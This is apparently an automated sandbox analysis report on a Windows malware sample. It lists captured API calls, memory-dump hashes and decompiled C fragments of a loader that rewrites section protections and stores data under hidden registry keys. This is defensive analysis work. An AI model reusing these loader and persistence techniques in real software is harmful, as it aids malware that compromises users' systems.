                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?), ref: 00444904
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 0044491F
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Virtual$AllocFreememcpy
• String ID: Nov 3 2020
• API String ID: 4010158826-2364069389
• Opcode ID: 1a5138f05fddb6ffbee7879fe2e1db949c3f5736252f3881c80530c86db9aa75
• Instruction ID: 67631c4924c49c625da8068c3c30550b7f5dbfbcd84053568a26e4f0e3d58c11
• Opcode Fuzzy Hash: 1a5138f05fddb6ffbee7879fe2e1db949c3f5736252f3881c80530c86db9aa75
• Instruction Fuzzy Hash: E3314B71E00219ABEB00DFA5DC81BEFB7B9FF48704F14406AE900B7241D7B59A059B99
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00463FD8,80000001,Client32,?,80000001), ref: 00457E3F
• RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00457E56
• HeapFree.KERNEL32(00000000,00000000,?,?,?,00463FD8,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA), ref: 00457E71
• RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,?,?,00463FD8,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\), ref: 00457E90
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: HeapQueryValue$AllocateFree
• String ID:
• API String ID: 4267586637-0
• Opcode ID: 1bda36edee3e4866320df6a318fc2cbd9e8ff344bfb92431f50f07ad62f3b483
• Instruction ID: 0131c7e27d0226b3e2aa67c89540125f17230a0f260dd8c8229d8b8bb3ddf490
• Opcode Fuzzy Hash: 1bda36edee3e4866320df6a318fc2cbd9e8ff344bfb92431f50f07ad62f3b483
• Instruction Fuzzy Hash: 77118CB6900208FFCB128F94EC85CEFBBBDEB88710F1040A6FC01A2210E2B15E44DB64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%
E73752058() {
    char _v28;
    void _v44;
    char _v48;
    void* _v52;
    long _t24;
    int _t25;
    void* _t29;
    intOrPtr* _t31;
    signed int _t34;
    void* _t36;
    intOrPtr _t37;
    int _t41;

    *0x73754148 = *0x73754148 & 0x00000000;
    _push(0);
    _push(0x73754144);
    _push(1);
    _push(*0x73754150 + 0x73755084);
    *0x73754140 = 0xc; // executed
    L7375187A(); // executed
    _t34 = 6;
    memset(&_v44, 0, _t34 << 2);
    if(E73751A17(&_v44, &_v28, *0x7375414c ^ 0xc786104c) == 0) {
        _t24 = 0xb;
        L7:
        ExitThread(_t24);
    }
    _t25 = lstrlenW(*0x73754138);
    _t7 = _t25 + 2; // 0x2
    _t41 = _t25 + _t7;
    _t10 = _t41 + 8; // 0xa
    _t29 = E737513E4(_t37, _t10, &_v48, &_v52); // executed
    if(_t29 == 0) {
        _t36 = *0x73754138;
        _t31 = _v52;
        *_t31 = 0;
        if(_t36 == 0) {
            *(_t31 + 4) = *(_t31 + 4) & 0x00000000;
        } else {
            memcpy(_t31 + 4, _t36, _t41);
        }
    }
    _t24 = E737515AB(_v44, _t37); // executed
    goto L7;
}

Instruction addresses of the decompiled statements above, in order: 0x73752063, 0x7375206e, 0x73752070, 0x73752075, 0x7375207d, 0x7375207e, 0x73752088, 0x73752091, 0x73752096, 0x737520b4, 0x73752113, 0x73752114, 0x73752115, 0x73752115, 0x737520bc, 0x737520c2, 0x737520c2, 0x737520d0, 0x737520d4, 0x737520db, 0x737520dd, 0x737520e5, 0x737520e9, 0x737520ef, 0x73752101, 0x737520f1, 0x737520f7, 0x737520fc, 0x737520ef, 0x7375210a, 0x00000000

APIs
• ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,73754144,00000000), ref: 73752088
  • Part of subcall function 73751A17: EntryPoint.ONEROUS.TAR(?,00000000,?,?,00000000,-00000008,73751DE8), ref: 73751AA2
• lstrlenW.KERNEL32(?,?,?), ref: 737520BC
  • Part of subcall function 737513E4: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A,?), ref: 737513F1
  • Part of subcall function 737513E4: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 73751407
  • Part of subcall function 737513E4: _snwprintf.NTDLL ref: 7375142C
  • Part of subcall function 737513E4: CreateFileMappingW.KERNELBASE(000000FF,73754140,00000004,00000000,?,?), ref: 73751451
  • Part of subcall function 737513E4: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A), ref: 73751468
  • Part of subcall function 737513E4: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9), ref: 7375149D
• memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 737520F7
• ExitThread.KERNEL32 ref: 73752115
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
Similarity
• API ID: DescriptorFileSecurityTime$CloseConvertCreateEntryErrorExitHandleLastMappingPoint.StringSystemThread_aulldiv_snwprintflstrlenmemcpy
• String ID:
• API String ID: 617961352-0
• Opcode ID: 5b201e3b7882eecca9c9396c82516936c0745d8d76e809bfc70d92f4f5f91fd5
• Instruction ID: c8b0d000d95ddf103c76dd2efa6eed829b18eb0aa26bdf7825d299e38ce2eaf8
• Opcode Fuzzy Hash: 5b201e3b7882eecca9c9396c82516936c0745d8d76e809bfc70d92f4f5f91fd5
• Instruction Fuzzy Hash: 2E1186B3504309ABEB09EB62CD89F8777FCBB54304F210519F549D7191EB38E5488B51
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0046E088,00000000,004461B5,?,004426F5,?), ref: 0044101F
• PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0046E088,00000000,004461B5,?,004426F5,?), ref: 0044102A
• _wcsupr.NTDLL ref: 00441037
• lstrlenW.KERNEL32(00000000), ref: 0044103F
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
• String ID:
• API String ID: 2533608484-0
• Opcode ID: f45770e146b75955b0a4d9cfdb4532775378a75c9b95312a5de4e76e383c3751
• Instruction ID: 94e06660942a37fdadefd76641d463bd482c38fea51708cabe3f421a0301094e
• Opcode Fuzzy Hash: f45770e146b75955b0a4d9cfdb4532775378a75c9b95312a5de4e76e383c3751
• Instruction Fuzzy Hash: 85F0E9322011516FE7216B765CC9F6F56A9FBC1B95B10053FF900E2261DFACCC89816E
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0045D897
  • Part of subcall function 004489B7: RtlEnterCriticalSection.NTDLL(00000000), ref: 004489C3
  • Part of subcall function 004489B7: CloseHandle.KERNEL32(?), ref: 004489D1
  • Part of subcall function 004489B7: RtlLeaveCriticalSection.NTDLL(00000000), ref: 004489ED
• CloseHandle.KERNEL32(?), ref: 0045D8A5
• InterlockedDecrement.KERNEL32(0046DF5C), ref: 0045D8B4
  • Part of subcall function 004454F0: SetEvent.KERNEL32(00000320,0045D8CF), ref: 004454FA
  • Part of subcall function 004454F0: CloseHandle.KERNEL32(00000320), ref: 0044550F
  • Part of subcall function 004454F0: HeapDestroy.KERNELBASE(037E0000), ref: 0044551F
• RtlExitUserThread.NTDLL(00000000), ref: 0045D8D0
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
• String ID:
• API String ID: 1141245775-0
• Opcode ID: 26e94bf2be6ee8a41633443304df456630f13be3a59139b3c090e69a2887235e
• Instruction ID: e1e5acccdb1dd43bcdbecf726bed4450c52cb34eef8151369af9d85c92eac628
• Opcode Fuzzy Hash: 26e94bf2be6ee8a41633443304df456630f13be3a59139b3c090e69a2887235e
• Instruction Fuzzy Hash: DFF08130940604BBDB116B698C05B6A3778FF45721F11032EF926872D1EBB858058B6E
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044E8F7: RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
  • Part of subcall function 0044E8F7: lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
• RegQueryValueExA.KERNELBASE(00000000,Client,00000000,004535D4,0046D06C,004442B8,00000001,00000000,03BD8D64,0046D072,00000000,004535D4,03BD8D64,7742C740,00000000,004442B8), ref: 0045AEBC
• RegCloseKey.KERNELBASE(?), ref: 0045AF07
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CloseCreateQueryValuelstrlen
• String ID: Client
• API String ID: 971780412-3236430179
• Opcode ID: f5d3777f135677217a1442a6007d0bfd322f9e3feef4635b4a80639bdc26fbef
• Instruction ID: ab9b9c8d777804e12363ec9f1a1d2479be83279e714d629aff2261d4ae5dd657
• Opcode Fuzzy Hash: f5d3777f135677217a1442a6007d0bfd322f9e3feef4635b4a80639bdc26fbef
• Instruction Fuzzy Hash: 512180B1E40208FFDB109B56DC05B9E7BB8EB04719F00417BF904AA251E7B85A46CF6E
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044E8F7: RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                          • Part of subcall function 0044E8F7: lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,System,00000000,0044BA55,?,?,00000001,?,00000001,00000000,?,?,?,00000000,0044BA55), ref: 0045E3C8
                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,00000000,0044BA55), ref: 0045E41C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateQueryValuelstrlen
                                                                                                                                        • String ID: System
                                                                                                                                        • API String ID: 971780412-3470857405
                                                                                                                                        • Opcode ID: 9567f225f5d1efcd999e875e8c0c4d27b342c11f88307ebcea3a6a6e170ed860
                                                                                                                                        • Instruction ID: efdac91738b666af08414f75e8b839988ba332672dea95d8b1cf4c46aa921312
                                                                                                                                        • Opcode Fuzzy Hash: 9567f225f5d1efcd999e875e8c0c4d27b342c11f88307ebcea3a6a6e170ed860
                                                                                                                                        • Instruction Fuzzy Hash: 1C114F35D00118FFEF10DBA6DC05BDE7BB8FB45705F000076E900A6152E7B46A49DB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00462D68
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00462DA4
                                                                                                                                          • Part of subcall function 0044106E: lstrlen.KERNEL32(?,?,?,?,00000000,?,00444163,?), ref: 004410BB
                                                                                                                                          • Part of subcall function 0044106E: VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,?,?,00000000,?,00444163,?), ref: 004410CD
                                                                                                                                          • Part of subcall function 0044106E: lstrcpy.KERNEL32(00000000,?), ref: 004410DC
                                                                                                                                          • Part of subcall function 0044106E: VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,?,?,00000000,?,00444163,?), ref: 004410ED
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 1872894792-3652835401
                                                                                                                                        • Opcode ID: 50703be8bfce2daf1658356e10da9d6842a12303daa6fdf076fe6d1c0ecea4e3
                                                                                                                                        • Instruction ID: f8f52aee1f6b9ba4b4905855fd1595f6effaa9b54a3adc83ef054c64d2db6625
                                                                                                                                        • Opcode Fuzzy Hash: 50703be8bfce2daf1658356e10da9d6842a12303daa6fdf076fe6d1c0ecea4e3
                                                                                                                                        • Instruction Fuzzy Hash: BFF0A7792022149B87206F1ADD54C69B7DDEB55714315029FF94197310EBBA5C40C697
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00450ECA
                                                                                                                                        • memcpy.NTDLL ref: 00450EF2
                                                                                                                                          • Part of subcall function 00461813: NtAllocateVirtualMemory.NTDLL([uE,00000000,00000000,[uE,00003000,00000040,?,?,?,0045755B), ref: 00461844
                                                                                                                                          • Part of subcall function 00461813: RtlNtStatusToDosError.NTDLL(00000000), ref: 0046184B
                                                                                                                                          • Part of subcall function 00461813: SetLastError.KERNEL32(00000000,?,?,?,0045755B), ref: 00461852
                                                                                                                                        • GetLastError.KERNEL32(00000010,00000218,00466B7D,00000100,?,00000318,00000008), ref: 00450F09
                                                                                                                                        • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00466B7D,00000100), ref: 00450FEC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 685050087-0
                                                                                                                                        • Opcode ID: a9b4646cc1f08e9159ef6df77c51881bca5d7af6f03a17ebaba99903ea7bfd90
                                                                                                                                        • Instruction ID: d03be042b3c0b4bb35fe672fdaaed621bbd358b8a04a8e6fa1fd9dcac2e825f1
                                                                                                                                        • Opcode Fuzzy Hash: a9b4646cc1f08e9159ef6df77c51881bca5d7af6f03a17ebaba99903ea7bfd90
                                                                                                                                        • Instruction Fuzzy Hash: BB41A2B2504301AFD770DF25CC41B9BB7E8FB48315F00492EF998C6291E774D9188B6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                        			E73751EDE(void* __eax, long __edx, void* _a4) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				signed int _v12;
                                                                                                                                        				long _v16;
                                                                                                                                        				signed int _v20;
                                                                                                                                        				int _t33;
                                                                                                                                        				signed int _t36;
                                                                                                                                        				long _t41;
                                                                                                                                        				void* _t50;
                                                                                                                                        				void* _t51;
                                                                                                                                        				signed int _t54;
                                                                                                                                        
                                                                                                                                        				_t41 = __edx;
                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                        				_t36 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                        				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                        				_v20 = _t36;
                                                                                                                                        				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                        				if(_t36 <= 0) {
                                                                                                                                        					L11:
                                                                                                                                        					return _v12;
                                                                                                                                        				}
                                                                                                                                        				_t51 = _t50 + 0x24;
                                                                                                                                        				while(1) {
                                                                                                                                        					_t54 = _v12;
                                                                                                                                        					if(_t54 != 0) {
                                                                                                                                        						goto L11;
                                                                                                                                        					}
                                                                                                                                        					asm("bt dword [esi], 0x1d");
                                                                                                                                        					if(_t54 >= 0) {
                                                                                                                                        						asm("bt dword [esi], 0x1e");
                                                                                                                                        						if(__eflags >= 0) {
                                                                                                                                        							_t41 = 4;
                                                                                                                                        						} else {
                                                                                                                                        							asm("bt dword [esi], 0x1f");
                                                                                                                                        							asm("sbb edx, edx");
                                                                                                                                        							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
                                                                                                                                        						}
                                                                                                                                        					} else {
                                                                                                                                        						asm("bt dword [esi], 0x1f");
                                                                                                                                        						asm("sbb edx, edx");
                                                                                                                                        						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
                                                                                                                                        					}
                                                                                                                                        					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
                                                                                                                                        					if(_t33 == 0) {
                                                                                                                                        						_v12 = GetLastError();
                                                                                                                                        					}
                                                                                                                                        					_t51 = _t51 + 0x28;
                                                                                                                                        					_v8 = _v8 + 1;
                                                                                                                                        					if(_v8 < _v20) {
                                                                                                                                        						continue;
                                                                                                                                        					} else {
                                                                                                                                        						goto L11;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				goto L11;
                                                                                                                                         			}

                                                                                                                                        0x73751ede
                                                                                                                                        0x73751ee8
                                                                                                                                        0x73751eed
                                                                                                                                        0x73751ef9
                                                                                                                                        0x73751f06
                                                                                                                                        0x73751f0c
                                                                                                                                        0x73751f0e
                                                                                                                                        0x73751f14
                                                                                                                                        0x73751f80
                                                                                                                                        0x73751f87
                                                                                                                                        0x73751f87
                                                                                                                                        0x73751f16
                                                                                                                                        0x73751f19
                                                                                                                                        0x73751f19
                                                                                                                                        0x73751f1d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751f1f
                                                                                                                                        0x73751f23
                                                                                                                                        0x73751f38
                                                                                                                                        0x73751f3c
                                                                                                                                        0x73751f52
                                                                                                                                        0x73751f3e
                                                                                                                                        0x73751f3e
                                                                                                                                        0x73751f47
                                                                                                                                        0x73751f4d
                                                                                                                                        0x73751f4d
                                                                                                                                        0x73751f25
                                                                                                                                        0x73751f25
                                                                                                                                        0x73751f2e
                                                                                                                                        0x73751f33
                                                                                                                                        0x73751f33
                                                                                                                                        0x73751f63
                                                                                                                                        0x73751f67
                                                                                                                                        0x73751f6f
                                                                                                                                        0x73751f6f
                                                                                                                                        0x73751f72
                                                                                                                                        0x73751f75
                                                                                                                                        0x73751f7e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751f7e
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 73751F0C
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 73751F63
                                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 73751F69
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
                                                                                                                                         • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1469625949-0
                                                                                                                                        • Opcode ID: 469155247b6020d75ad0ad1df8ffc78bd51cf6cd3a3ef004a8e005fdd60509c8
                                                                                                                                        • Instruction ID: 2861e5021454eb5c67247a0ac0ccfab1f3326343a040b6eb2a4ea2ec0bf53b08
                                                                                                                                        • Opcode Fuzzy Hash: 469155247b6020d75ad0ad1df8ffc78bd51cf6cd3a3ef004a8e005fdd60509c8
                                                                                                                                        • Instruction Fuzzy Hash: 3C210273900209EFEF158F89D880FADB3B9FB4035AF248049F540A7182E3749A89CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,00459CC3,?,?,?,?,00000000,0046A578,00000018,0045EBA1,00000000,?), ref: 0044BF24
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,00000040,00000000,?,00000000,?,?,?,00459CC3,?,?,?,?,00000000,0046A578), ref: 0044BF3E
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,?,?,?,00459CC3,?,?,?,?,00000000,0046A578,00000018,0045EBA1), ref: 0044BF71
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$lstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 386137988-0
                                                                                                                                        • Opcode ID: 1bbc88560e1e239290e62a3a5b336ee4ef42da757272e21acbedd96a81772796
                                                                                                                                        • Instruction ID: be4d9ee21c20da10a6a8216e99271ab0ca1e9d2923c27e501b6cad12531dd1cd
                                                                                                                                        • Opcode Fuzzy Hash: 1bbc88560e1e239290e62a3a5b336ee4ef42da757272e21acbedd96a81772796
                                                                                                                                        • Instruction Fuzzy Hash: 86112E75901208FFEB10CF54C885F9EBBB8EF04755F108199FD0896211D3B8DA859BE9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E919
                                                                                                                                        • lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateOpenlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2865187142-0
                                                                                                                                        • Opcode ID: 37a2faea5783947838b1a6bddde04c610438300df2576fa1a6315c4842e325f2
                                                                                                                                        • Instruction ID: 7c6ce866e468e09438cbfba813f69ad38f56582faa2aa1b434a657b4d210ac99
                                                                                                                                        • Opcode Fuzzy Hash: 37a2faea5783947838b1a6bddde04c610438300df2576fa1a6315c4842e325f2
                                                                                                                                        • Instruction Fuzzy Hash: FAF062B5904208BFFB109F51DC88EAB7BACEB45354F10412AFD4582250E6749A40C7A9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • UnmapViewOfFile.KERNEL32(00430440,?,00430440,?,0043002D,00430440,?,00430440), ref: 00430119
                                                                                                                                        • VirtualFree.KERNELBASE(00430440,00000000,00008000,?,00430440,?,0043002D,00430440,?,00430440), ref: 00430127
                                                                                                                                        • VirtualAlloc.KERNELBASE(00430440,?,00003000,00000040,?,00430440,?,0043002D,00430440,?,00430440), ref: 00430139
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFileFreeUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3711693493-0
                                                                                                                                        • Opcode ID: 52797b44c187e508bc199d309972fc3d2aa68249d6ffe84740fcb2371e9786b2
                                                                                                                                        • Instruction ID: cb57eb1f2dc795ff73d19b7887786a642dc00afecfe09ef0063f869e4c4d6973
                                                                                                                                        • Opcode Fuzzy Hash: 52797b44c187e508bc199d309972fc3d2aa68249d6ffe84740fcb2371e9786b2
                                                                                                                                        • Instruction Fuzzy Hash: 52F06831240300ABDB209B15CC49BBB7778EFC9B54F184169FD456B645C774F802C769
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,0045840E,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450D9
                                                                                                                                        • IsWow64Process.KERNEL32(00000000,00000000,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450EA
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3805842350-0
                                                                                                                                        • Opcode ID: 0cfca0ab48fb12453a53661ffdcf369ea2af43f7734f5247d6c4db3fa6b48ae7
                                                                                                                                        • Instruction ID: e57c7ac610f52a6e215738570f827ddbcfc46e521ec8d05018e4601402ed5c85
                                                                                                                                        • Opcode Fuzzy Hash: 0cfca0ab48fb12453a53661ffdcf369ea2af43f7734f5247d6c4db3fa6b48ae7
                                                                                                                                        • Instruction Fuzzy Hash: CCF0BE36900514FBDB219F59DC0499FBBB8EB80790B11812AF904A2200E6744E40CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(00000320,0045D8CF), ref: 004454FA
                                                                                                                                          • Part of subcall function 0044AB47: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00445505), ref: 0044AB70
                                                                                                                                          • Part of subcall function 0044AB47: RtlDeleteCriticalSection.NTDLL(0046E220), ref: 0044ABA3
                                                                                                                                          • Part of subcall function 0044AB47: RtlDeleteCriticalSection.NTDLL(0046E240), ref: 0044ABAA
                                                                                                                                          • Part of subcall function 0044AB47: CloseHandle.KERNEL32(?,?,00445505), ref: 0044ABD9
                                                                                                                                          • Part of subcall function 0044AB47: ReleaseMutex.KERNEL32(00000324,00000000,?,?,?,00445505), ref: 0044ABEA
                                                                                                                                          • Part of subcall function 0044AB47: FindCloseChangeNotification.KERNELBASE(?,?,00445505), ref: 0044ABF6
                                                                                                                                          • Part of subcall function 0044AB47: ResetEvent.KERNEL32(00000000,00000000,?,?,?,00445505), ref: 0044AC02
                                                                                                                                          • Part of subcall function 0044AB47: CloseHandle.KERNEL32(?,?,00445505), ref: 0044AC0E
                                                                                                                                          • Part of subcall function 0044AB47: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,00445505), ref: 0044AC14
                                                                                                                                          • Part of subcall function 0044AB47: SleepEx.KERNEL32(00000064,00000001,?,?,00445505), ref: 0044AC28
                                                                                                                                          • Part of subcall function 0044AB47: HeapFree.KERNEL32(00000000,00000000,?,?,00445505), ref: 0044AC4B
                                                                                                                                          • Part of subcall function 0044AB47: RtlRemoveVectoredExceptionHandler.NTDLL(00644280), ref: 0044AC84
                                                                                                                                        • CloseHandle.KERNEL32(00000320), ref: 0044550F
                                                                                                                                        • HeapDestroy.KERNELBASE(037E0000), ref: 0044551F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$HandleSleep$CriticalDeleteEventHeapSection$ChangeDestroyExceptionFindFreeHandlerMutexNotificationReleaseRemoveResetVectored
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 891263893-0
                                                                                                                                        • Opcode ID: d76be319d152245e0e68b91ca23121ddbf3cd7312b9563856cd1ccf62d604eb5
                                                                                                                                        • Instruction ID: aa3b984d9eb7676fec0be5f42f4e919d735aa2026a9f21996af7dd56e1a12f86
                                                                                                                                        • Opcode Fuzzy Hash: d76be319d152245e0e68b91ca23121ddbf3cd7312b9563856cd1ccf62d604eb5
                                                                                                                                        • Instruction Fuzzy Hash: 17E012B070020197EF006B31EC4CE1777D9AB043053090839F405C6265FFB8E888DA2F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
